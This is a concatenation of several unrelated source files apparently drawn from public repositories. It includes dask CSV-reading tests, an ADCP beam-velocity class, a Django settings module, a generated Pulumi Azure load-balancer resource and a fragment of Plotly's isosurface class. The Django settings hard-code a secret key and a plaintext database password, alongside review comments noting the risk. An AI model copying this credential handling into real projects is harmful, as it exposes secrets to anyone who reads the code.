    frame = bytes_read_csv(body, first_line + b'\n', {})
    assert list(frame.columns) == ['name', 'amount', 'id']
    assert len(frame) == 3
    assert frame.id.sum() == 6
def test_read_csv_simple():
    """read_csv_from_bytes builds either a dask DataFrame or delayed values."""
    # One block (list of byte strings) per file, in sorted filename order.
    blocks = [[files[k]] for k in sorted(files)]
    kwargs = {}
    head = bytes_read_csv(files['2014-01-01.csv'], b'', {})

    # collection=True -> a single dask DataFrame spanning all blocks.
    df = read_csv_from_bytes(blocks, header, head, kwargs, collection=True)
    assert isinstance(df, dd.DataFrame)
    assert list(df.columns) == ['name', 'amount', 'id']

    # collection=False -> a list of delayed values, one per block.
    values = read_csv_from_bytes(blocks, header, head, kwargs,
                                 collection=False)
    assert isinstance(values, list)
    assert len(values) == 3
    assert all(hasattr(item, 'dask') for item in values)

    result = df.amount.sum().compute(get=get_sync)
    assert result == (100 + 200 + 300 + 400 + 500 + 600)
def test_kwargs():
    """Keyword arguments (here usecols) are forwarded to every partition."""
    blocks = [[files[name]] for name in sorted(files)]
    kwargs = {'usecols': ['name', 'id']}
    head = bytes_read_csv(files['2014-01-01.csv'], b'', kwargs)
    df = read_csv_from_bytes(blocks, header, head, kwargs, collection=True)
    assert list(df.columns) == ['name', 'id']
    result = df.compute()
    assert (result.columns == df.columns).all()
def test_blocked():
    """Files re-chunked into 2-line blocks still concatenate correctly."""
    blocks = []
    for k in sorted(files):
        b = files[k]
        lines = b.split(b'\n')
        # Simulate byte-range splitting by grouping every 2 lines per block.
        blocks.append([b'\n'.join(bs) for bs in partition_all(2, lines)])

    df = read_csv_from_bytes(blocks, header, expected.head(), {})
    eq(df.compute().reset_index(drop=True),
       expected.reset_index(drop=True), check_dtype=False)

    # usecols must be honored in every block, not just the sample.
    expected2 = expected[['name', 'id']]
    df = read_csv_from_bytes(blocks, header, expected2.head(),
                             {'usecols': ['name', 'id']})
    eq(df.compute().reset_index(drop=True),
       expected2.reset_index(drop=True), check_dtype=False)
def test_enforce_dtypes():
    """With enforce_dtypes=True every partition gets the sample's dtypes."""
    # NOTE(review): the b'2.2.0' row looks like a typo for b'2,2.0' (it
    # parses as a single field) -- the test still exercises dtype
    # enforcement, but confirm the intent before "fixing" the data.
    blocks = [[b'aa,bb\n1,1.0\n2.2.0', b'10,20\n30,40'],
              [b'aa,bb\n1,1.0\n2.2.0', b'10,20\n30,40']]
    head = pd.read_csv(BytesIO(blocks[0][0]), header=0)
    dfs = read_csv_from_bytes(blocks, b'aa,bb\n', head, {},
                              enforce_dtypes=True, collection=False)
    dfs = compute(*dfs)
    # All partitions must share the dtypes inferred from the sample `head`.
    assert all(df.dtypes.to_dict() == head.dtypes.to_dict() for df in dfs)
def test_read_csv_files():
    """Glob patterns and single filenames both work against real files."""
    with filetexts(files, mode='b'):
        # Glob over all three files.
        df = read_csv('2014-01-*.csv')
        eq(df, expected, check_dtype=False)

        # A single explicit filename.
        fn = '2014-01-01.csv'
        single_expected = pd.read_csv(BytesIO(files[fn]))
        single = read_csv(fn)
        eq(single, single_expected, check_dtype=False)
# Compression test matrix: every known format with blocksize=None (one
# partition per file); seekable formats additionally with blocksize=10.
from dask.bytes.compression import compress, files as cfiles, seekable_files
fmt_bs = [(fmt, None) for fmt in cfiles] + [(fmt, 10) for fmt in seekable_files]
@pytest.mark.parametrize('fmt,blocksize', fmt_bs)
def test_read_csv_compression(fmt, blocksize):
    """Compressed files round-trip through read_csv for every format."""
    files2 = valmap(compress[fmt], files)
    with filetexts(files2, mode='b'):
        df = read_csv('2014-01-*.csv', compression=fmt, blocksize=blocksize)
        # Row order is preserved across files; indexes differ, so reset them.
        eq(df.compute(get=get_sync).reset_index(drop=True),
           expected.reset_index(drop=True), check_dtype=False)
def test_warn_non_seekable_files(capsys):
    """Non-seekable compression falls back to whole-file partitions with a warning."""
    files2 = valmap(compress['gzip'], files)
    with filetexts(files2, mode='b'):
        # gzip is not seekable: expect one partition per file plus a
        # stderr warning mentioning the format and the blocksize=None fix.
        df = read_csv('2014-01-*.csv', compression='gzip')
        assert df.npartitions == 3
        out, err = capsys.readouterr()
        assert 'gzip' in err
        assert 'blocksize=None' in err

        # Passing blocksize=None explicitly silences the warning.
        df = read_csv('2014-01-*.csv', compression='gzip', blocksize=None)
        out, err = capsys.readouterr()
        assert not err and not out

        # Unknown compression formats are rejected outright.
        with pytest.raises(NotImplementedError):
            df = read_csv('2014-01-*.csv', compression='foo')
def test_windows_line_terminator():
    """Tiny blocks may split inside a two-byte CRLF terminator; sums must survive."""
    text = 'a,b\r\n1,2\r\n2,3\r\n3,4\r\n4,5\r\n5,6\r\n6,7'
    with filetext(text) as path:
        frame = read_csv(path, blocksize=5, lineterminator='\r\n')
        assert frame.b.sum().compute() == 27  # 2+3+4+5+6+7
        assert frame.a.sum().compute() == 21  # 1+2+3+4+5+6
def test_late_dtypes():
    """Dtype mismatches discovered after the sample raise a helpful TypeError.

    Both columns look integral in the 10-byte sample but turn into floats in
    later blocks; the error message must name the offending column, and
    supplying the correct dtypes up front must fix the computation.
    """
    text = 'a,b\n1,2\n2,3\n3,4\n4,5\n5.5,6\n6,7.5'
    with filetext(text) as fn:
        df = read_csv(fn, blocksize=5, sample=10)
        # Idiomatic pytest.raises instead of try/assert False/except.
        with pytest.raises(TypeError) as exc_info:
            df.b.sum().compute()
        assert ("'b': float" in str(exc_info.value) or
                "'a': float" in str(exc_info.value))

        df = read_csv(fn, blocksize=5, sample=10,
                      dtype={'a': float, 'b': float})
        assert df.a.sum().compute() == 1 + 2 + 3 + 4 + 5.5 + 6
        assert df.b.sum().compute() == 2 + 3 + 4 + 5 + 6 + 7.5
| [
"[email protected]"
] | |
8c69b04818eb1c529b6ad11ac1a9de153b213ba5 | 68747ba592c252c952823ff4973c9508b7c8c5e9 | /Ensemble/BeamVelocity.py | dfcd6b48965024dc062ad756bb54688fbce1a739 | [] | no_license | ricorx7/rti_python-1 | 50ce01e7acf60ad6d57c26cfe5d79ecd1fc84563 | 384edef9c14ae5296d7e123eec473b29905a8a58 | refs/heads/master | 2023-02-01T04:33:48.585793 | 2020-12-16T23:25:22 | 2020-12-16T23:25:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,649 | py | from rti_python.Ensemble.Ensemble import Ensemble
import logging
class BeamVelocity:
    """
    Beam Velocity DataSet.

    Holds beam-coordinate velocities as a [Bin x Beam] table of floats
    (cells hold Ensemble.BadVelocity until decode() fills them).
    """

    def __init__(self, num_elements, element_multiplier):
        """
        Beam Velocity data.
        :param num_elements: Number of bins.
        :param element_multiplier: Number of beams.
        """
        self.ds_type = 10                            # Dataset type code for beam velocity.
        self.num_elements = num_elements
        self.element_multiplier = element_multiplier
        self.image = 0
        self.name_len = 8
        self.Name = "E000001\0"

        # [bin][beam] table initialized with bad-velocity scalars.
        # Fix: each cell previously held a one-element list ([BadVelocity])
        # instead of a float, which broke encode()/encode_csv()/
        # pd0_mm_per_sec() when called before decode() (decode() assigns
        # plain floats).
        bad_velocity = Ensemble().BadVelocity
        self.Velocities = [[bad_velocity for _ in range(element_multiplier)]
                           for _ in range(num_elements)]

    def decode(self, data):
        """
        Take the data bytearray.  Decode the data to populate
        the velocities.
        :param data: Bytearray for the dataset.
        """
        packet_pointer = Ensemble.GetBaseDataSize(self.name_len)

        # Data is serialized beam-major: all bins of beam 0, then beam 1, ...
        for beam in range(self.element_multiplier):
            for bin_num in range(self.num_elements):
                self.Velocities[bin_num][beam] = Ensemble.GetFloat(packet_pointer, Ensemble().BytesInFloat, data)
                packet_pointer += Ensemble().BytesInFloat

        logging.debug(self.Velocities)

    def encode(self):
        """
        Encode the data into RTB format.
        :return: List of bytes: header followed by beam-major float data.
        """
        result = []

        # Generate header
        result += Ensemble.generate_header(self.ds_type,
                                           self.num_elements,
                                           self.element_multiplier,
                                           self.image,
                                           self.name_len,
                                           self.Name)

        # Add the data, beam-major to mirror decode().
        for beam in range(self.element_multiplier):
            for bin_num in range(self.num_elements):
                val = self.Velocities[bin_num][beam]
                result += Ensemble.float_to_bytes(val)

        return result

    def encode_csv(self, dt, ss_code, ss_config, blank, bin_size):
        """
        Encode into CSV format.
        :param dt: Datetime object.
        :param ss_code: Subsystem code.
        :param ss_config: Subsystem Configuration.
        :param blank: Blank or first bin position in meters.
        :param bin_size: Bin size in meters.
        :return: List of CSV lines, one per (bin, beam) cell.
        """
        str_result = []

        for beam in range(self.element_multiplier):
            for bin_num in range(self.num_elements):
                val = self.Velocities[bin_num][beam]
                str_result.append(Ensemble.gen_csv_line(dt, Ensemble.CSV_BEAM_VEL, ss_code, ss_config, bin_num, beam, blank, bin_size, val))

        return str_result

    def pd0_mm_per_sec(self, pd0_beam_num: int):
        """
        Convert the Beam Velocity from m/s to mm/s and as an integer.
        Also remap the Beam numbers to match PD0 beams.
        RTB and PD0 do not share the same Beam Order
        RTB BEAM 0,1,2,3 = PD0 BEAM 3,2,0,1
        :param pd0_beam_num: PD0 Beam number.
        :type pd0_beam_num: Integer
        :return: List of velocities (mm/s, int) for the remapped beam; RTB
                 bad velocities become the PD0 bad-velocity marker -32768.
        :rtype: List
        """
        # Remap the PD0 beam number to the RTB beam index (PD0 order 3,2,0,1).
        rti_beam_num = 0
        if self.element_multiplier == 1:                # Vertical beam
            rti_beam_num = 0
        elif pd0_beam_num == 0:
            rti_beam_num = 2
        elif pd0_beam_num == 1:
            rti_beam_num = 3
        elif pd0_beam_num == 2:
            rti_beam_num = 1
        elif pd0_beam_num == 3:
            rti_beam_num = 0

        # Replace the RTB BAD_VELOCITY (88.888) with PD0 BAD_VELOCITY (-32768).
        pd0_vel_data = []
        for bin_idx in range(self.num_elements):
            if Ensemble.is_bad_velocity(self.Velocities[bin_idx][rti_beam_num]):
                pd0_vel_data.append(-32768)
            else:
                # Convert m/s to mm/s and round to an integer.
                pd0_vel_data.append(round(self.Velocities[bin_idx][rti_beam_num] * 1000.0))

        return pd0_vel_data
| [
"[email protected]"
] | |
b35b6265d2f87725bbf04c7a1a015b18573508d8 | db7b618e7d9f7c2af001678e7bc7dd703cb86e61 | /TelegramBot/settings.py | 5bcca8b1e223f39bd5a3ac86c3f826827b3c5348 | [] | no_license | abdullakn/impress.ai | 6f24403b70130d8b6440ceab22931cd1cdcb9aeb | c9033970d33304a306fd6dd5e8cc9c1e39ddf1d8 | refs/heads/master | 2023-08-10T18:07:19.462283 | 2021-09-29T17:27:52 | 2021-09-29T17:27:52 | 411,642,025 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,388 | py | """
Django settings for TelegramBot project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
from decouple import config
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): SECRET_KEY is hard-coded; load it via decouple's config()
# (as done for TOKEN below) before deploying.
SECRET_KEY = '$iep-wj!47lovz7ui4i27t7e5c8d9o$pnmw#@l27sb_t-c5pig'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Telegram bot token, read from the environment / .env via python-decouple.
TOKEN = config('TOKEN')
TELEGRAM = {
    'bot_token': TOKEN,
    'channel_name': 'Impress',
}

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'telegramApp',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'TelegramBot.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [BASE_DIR / 'templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'TelegramBot.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# NOTE(review): the database password is committed in plain text; move the
# credentials into environment variables (decouple config()) like TOKEN.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME':'impressDB',
        'USER':'postgres',
        'PASSWORD':'Abdulla@123',
        'HOST':'localhost'
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/

STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'),]
"[email protected]"
] | |
4a28f0deec15c745ccc4aa180c151746c3d8af36 | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/network/v20181001/load_balancer.py | 0a7b74a91059e38d8ca28b8ffa74b27e5b17a0d9 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,538 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['LoadBalancer']
class LoadBalancer(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backend_address_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BackendAddressPoolArgs']]]]] = None,
etag: Optional[pulumi.Input[str]] = None,
frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]]] = None,
id: Optional[pulumi.Input[str]] = None,
inbound_nat_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InboundNatPoolArgs']]]]] = None,
inbound_nat_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InboundNatRuleArgs']]]]] = None,
load_balancer_name: Optional[pulumi.Input[str]] = None,
load_balancing_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LoadBalancingRuleArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
outbound_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OutboundRuleArgs']]]]] = None,
probes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProbeArgs']]]]] = None,
provisioning_state: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_guid: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['LoadBalancerSkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
LoadBalancer resource
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BackendAddressPoolArgs']]]] backend_address_pools: Collection of backend address pools used by a load balancer
:param pulumi.Input[str] etag: A unique read-only string that changes whenever the resource is updated.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]] frontend_ip_configurations: Object representing the frontend IPs to be used for the load balancer
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InboundNatPoolArgs']]]] inbound_nat_pools: Defines an external port range for inbound NAT to a single backend port on NICs associated with a load balancer. Inbound NAT rules are created automatically for each NIC associated with the Load Balancer using an external port from this range. Defining an Inbound NAT pool on your Load Balancer is mutually exclusive with defining inbound Nat rules. Inbound NAT pools are referenced from virtual machine scale sets. NICs that are associated with individual virtual machines cannot reference an inbound NAT pool. They have to reference individual inbound NAT rules.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InboundNatRuleArgs']]]] inbound_nat_rules: Collection of inbound NAT Rules used by a load balancer. Defining inbound NAT rules on your load balancer is mutually exclusive with defining an inbound NAT pool. Inbound NAT pools are referenced from virtual machine scale sets. NICs that are associated with individual virtual machines cannot reference an Inbound NAT pool. They have to reference individual inbound NAT rules.
:param pulumi.Input[str] load_balancer_name: The name of the load balancer.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LoadBalancingRuleArgs']]]] load_balancing_rules: Object collection representing the load balancing rules Gets the provisioning
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OutboundRuleArgs']]]] outbound_rules: The outbound rules.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProbeArgs']]]] probes: Collection of probe objects used in the load balancer
:param pulumi.Input[str] provisioning_state: Gets the provisioning state of the PublicIP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] resource_guid: The resource GUID property of the load balancer resource.
:param pulumi.Input[pulumi.InputType['LoadBalancerSkuArgs']] sku: The load balancer SKU.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['backend_address_pools'] = backend_address_pools
__props__['etag'] = etag
__props__['frontend_ip_configurations'] = frontend_ip_configurations
__props__['id'] = id
__props__['inbound_nat_pools'] = inbound_nat_pools
__props__['inbound_nat_rules'] = inbound_nat_rules
if load_balancer_name is None:
raise TypeError("Missing required property 'load_balancer_name'")
__props__['load_balancer_name'] = load_balancer_name
__props__['load_balancing_rules'] = load_balancing_rules
__props__['location'] = location
__props__['outbound_rules'] = outbound_rules
__props__['probes'] = probes
__props__['provisioning_state'] = provisioning_state
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['resource_guid'] = resource_guid
__props__['sku'] = sku
__props__['tags'] = tags
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20150501preview:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20150615:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20160330:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20160601:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20160901:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20161201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20170301:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20170601:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20170801:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20170901:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20171001:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20171101:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180101:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180401:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180601:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180701:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20180801:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20181101:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20181201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190401:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190601:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190701:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190801:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20190901:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20191101:LoadBalancer"), 
pulumi.Alias(type_="azure-nextgen:network/v20191201:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20200301:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20200401:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20200501:LoadBalancer"), pulumi.Alias(type_="azure-nextgen:network/v20200601:LoadBalancer")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(LoadBalancer, __self__).__init__(
'azure-nextgen:network/v20181001:LoadBalancer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'LoadBalancer':
"""
Get an existing LoadBalancer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return LoadBalancer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backendAddressPools")
def backend_address_pools(self) -> pulumi.Output[Optional[Sequence['outputs.BackendAddressPoolResponse']]]:
"""
Collection of backend address pools used by a load balancer
"""
return pulumi.get(self, "backend_address_pools")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="frontendIPConfigurations")
def frontend_ip_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.FrontendIPConfigurationResponse']]]:
"""
Object representing the frontend IPs to be used for the load balancer
"""
return pulumi.get(self, "frontend_ip_configurations")
@property
@pulumi.getter(name="inboundNatPools")
def inbound_nat_pools(self) -> pulumi.Output[Optional[Sequence['outputs.InboundNatPoolResponse']]]:
"""
Defines an external port range for inbound NAT to a single backend port on NICs associated with a load balancer. Inbound NAT rules are created automatically for each NIC associated with the Load Balancer using an external port from this range. Defining an Inbound NAT pool on your Load Balancer is mutually exclusive with defining inbound Nat rules. Inbound NAT pools are referenced from virtual machine scale sets. NICs that are associated with individual virtual machines cannot reference an inbound NAT pool. They have to reference individual inbound NAT rules.
"""
return pulumi.get(self, "inbound_nat_pools")
@property
@pulumi.getter(name="inboundNatRules")
def inbound_nat_rules(self) -> pulumi.Output[Optional[Sequence['outputs.InboundNatRuleResponse']]]:
"""
Collection of inbound NAT Rules used by a load balancer. Defining inbound NAT rules on your load balancer is mutually exclusive with defining an inbound NAT pool. Inbound NAT pools are referenced from virtual machine scale sets. NICs that are associated with individual virtual machines cannot reference an Inbound NAT pool. They have to reference individual inbound NAT rules.
"""
return pulumi.get(self, "inbound_nat_rules")
@property
@pulumi.getter(name="loadBalancingRules")
def load_balancing_rules(self) -> pulumi.Output[Optional[Sequence['outputs.LoadBalancingRuleResponse']]]:
"""
Object collection representing the load balancing rules Gets the provisioning
"""
return pulumi.get(self, "load_balancing_rules")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outboundRules")
def outbound_rules(self) -> pulumi.Output[Optional[Sequence['outputs.OutboundRuleResponse']]]:
"""
The outbound rules.
"""
return pulumi.get(self, "outbound_rules")
@property
@pulumi.getter
def probes(self) -> pulumi.Output[Optional[Sequence['outputs.ProbeResponse']]]:
"""
Collection of probe objects used in the load balancer
"""
return pulumi.get(self, "probes")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[Optional[str]]:
"""
Gets the provisioning state of the PublicIP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[Optional[str]]:
"""
The resource GUID property of the load balancer resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.LoadBalancerSkuResponse']]:
"""
The load balancer SKU.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"[email protected]"
] | |
3b7e7606078cd3ed5a6bce29f7891a86294ca375 | fb4473a0c00d89f55fb2d07bad3d62302a715f5b | /sidpy/__version__.py | 2fde28695a3068688f07069ca37f51f4ac4cf919 | [
"MIT"
] | permissive | ziatdinovmax/sidpy | b700535014b78eeddf3aff4b57f5110e220d9a2e | 299147bfc22741b5170aa00e92b34159dfc910c5 | refs/heads/master | 2022-12-19T07:28:39.509116 | 2020-10-03T00:31:20 | 2020-10-03T00:31:20 | 292,929,545 | 0 | 0 | MIT | 2020-09-04T19:23:14 | 2020-09-04T19:23:13 | null | UTF-8 | Python | false | false | 47 | py | version = '0.0.3'
time = '2020-09-18 10:00:25'
| [
"[email protected]"
] | |
a5056688c64509504bfa9c7a6d05f17f4545a6f5 | 41c605bf3a002a757cb2344cff526d7a7ae56ea9 | /plotly/graph_objs/isosurface/__init__.py | 641825ef79e0665708cf71c4b63a4d978f9ad605 | [
"MIT"
] | permissive | Jonathan-MW/plotly.py | 9674b90b5de11fd9089e6afefd04b57bc4587829 | 7528c00772f44dee24c0df7e15d70a4852f171a8 | refs/heads/master | 2020-05-30T06:04:13.621478 | 2019-05-31T10:34:15 | 2019-05-31T10:34:15 | 189,571,988 | 2 | 0 | MIT | 2019-05-31T09:59:53 | 2019-05-31T09:59:53 | null | UTF-8 | Python | false | false | 137,729 | py |
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Surface(_BaseTraceHierarchyType):

    # --- count -----------------------------------------------------------
    @property
    def count(self):
        """
        Sets the number of iso-surfaces between minimum and maximum
        iso-values. By default this value is 2 meaning that only
        minimum and maximum surfaces would be drawn.
    
        The 'count' property is a integer and may be specified as:
          - An int (or float that will be cast to an int)
            in the interval [1, 9223372036854775807]

        Returns
        -------
        int
        """
        return self['count']

    @count.setter
    def count(self, val):
        self['count'] = val

    # --- fill ------------------------------------------------------------
    @property
    def fill(self):
        """
        Sets the fill ratio of the iso-surface. The default fill value
        of the surface is 1 meaning that they are entirely shaded. On
        the other hand Applying a `fill` ratio less than one would
        allow the creation of openings parallel to the edges.
    
        The 'fill' property is a number and may be specified as:
          - An int or float in the interval [0, 1]

        Returns
        -------
        int|float
        """
        return self['fill']

    @fill.setter
    def fill(self, val):
        self['fill'] = val

    # --- pattern ---------------------------------------------------------
    @property
    def pattern(self):
        """
        Sets the surface pattern of the iso-surface 3-D sections. The
        default pattern of the surface is `all` meaning that the rest
        of surface elements would be shaded. The check options (either
        1 or 2) could be used to draw half of the squares on the
        surface. Using various combinations of capital `A`, `B`, `C`,
        `D` and `E` may also be used to reduce the number of triangles
        on the iso-surfaces and creating other patterns of interest.
    
        The 'pattern' property is a flaglist and may be specified
        as a string containing:
          - Any combination of ['A', 'B', 'C', 'D', 'E'] joined with '+' characters
            (e.g. 'A+B')
            OR exactly one of ['all', 'odd', 'even'] (e.g. 'even')

        Returns
        -------
        Any
        """
        return self['pattern']

    @pattern.setter
    def pattern(self, val):
        self['pattern'] = val

    # --- show ------------------------------------------------------------
    @property
    def show(self):
        """
        Hides/displays surfaces between minimum and maximum iso-values.
